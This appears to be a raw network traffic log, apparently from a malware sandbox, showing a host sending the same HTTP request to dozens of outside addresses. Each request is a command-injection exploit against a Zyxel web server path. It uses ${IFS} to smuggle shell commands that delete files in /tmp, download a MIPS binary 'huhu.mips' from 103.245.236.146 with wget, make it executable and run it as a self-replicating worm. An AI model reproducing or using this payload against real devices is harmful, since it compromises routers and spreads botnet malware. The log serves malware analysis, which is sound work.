                                                Jan 29, 2024 07:08:03.655509949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8146192.168.2.2359640191.42.25.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655555964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8147192.168.2.2351898211.148.232.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655687094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8148192.168.2.2336994103.28.83.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655702114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8149192.168.2.236070058.5.232.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655740023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8150192.168.2.234451412.205.213.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655781031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8151192.168.2.2350016147.110.191.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655817032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8152192.168.2.2357342145.88.78.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655841112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8153192.168.2.2344936213.3.31.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655893087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8154192.168.2.235519298.66.148.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655927896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8155192.168.2.2356814134.255.192.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655976057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8156192.168.2.234317892.109.110.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656009912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8157192.168.2.2355866185.226.156.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656056881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8158192.168.2.234714017.210.91.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656080961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8159192.168.2.233582253.144.79.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656138897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8160192.168.2.233450839.215.211.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656172991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8161192.168.2.234866614.40.189.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656248093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8162192.168.2.2345866144.0.173.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656265974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8163192.168.2.235205650.212.26.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656315088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8164192.168.2.233325662.247.77.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656363010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8165192.168.2.2352662143.175.218.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656403065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8166192.168.2.233935041.186.113.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656486034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8167192.168.2.2333776156.70.177.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656522036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8168192.168.2.2334870210.226.14.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656546116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8169192.168.2.235964277.246.183.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656584978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8170192.168.2.2360862195.212.208.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656610012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8171192.168.2.2341664172.165.218.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656646013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8172192.168.2.235536045.34.166.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656696081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8173192.168.2.23591724.220.26.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656754971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8174192.168.2.2346162174.174.93.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656773090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8175192.168.2.233877497.240.2.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656840086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8176192.168.2.233497687.123.78.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656881094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8177192.168.2.2350632146.222.8.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656919003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8178192.168.2.2333786136.44.216.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656966925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8179192.168.2.2335490172.238.129.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.656991005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8180192.168.2.2345296146.21.18.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657044888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8181192.168.2.2335394138.196.85.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657073021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8182192.168.2.234473052.46.40.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657118082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8183192.168.2.2334084162.238.157.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657145977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8184192.168.2.23593504.231.112.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657200098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8185192.168.2.2348974171.52.52.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657237053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8186192.168.2.235344498.191.170.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657386065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8187192.168.2.2354606160.128.101.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657418013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8188192.168.2.234436440.73.110.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657461882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8189192.168.2.233595438.170.15.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657485962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8190192.168.2.235475243.123.145.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657520056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8191192.168.2.2337006185.210.81.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657577038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8192192.168.2.234164265.253.104.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657624960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8193192.168.2.2355782219.42.186.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657661915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8194192.168.2.235647490.138.182.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657701969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8195192.168.2.23607549.89.150.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657738924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8196192.168.2.2346992156.16.249.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657795906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8197192.168.2.235785082.120.56.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657840014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8198192.168.2.2355208197.22.69.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657867908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8199192.168.2.2343418142.46.6.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657926083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8200192.168.2.2346892176.108.69.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657948017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8201192.168.2.2358526158.142.239.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.657996893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8202192.168.2.2338742197.176.127.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658036947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8203192.168.2.235990294.6.187.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658073902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8204192.168.2.235758299.82.20.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658134937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8205192.168.2.2345442178.155.128.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658152103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8206192.168.2.234842470.18.224.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658190966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8207192.168.2.2333618159.190.175.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658215046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8208192.168.2.2338170189.48.205.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.658250093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8209192.168.2.233296038.218.53.252443
                                                TimestampBytes transferredDirectionData
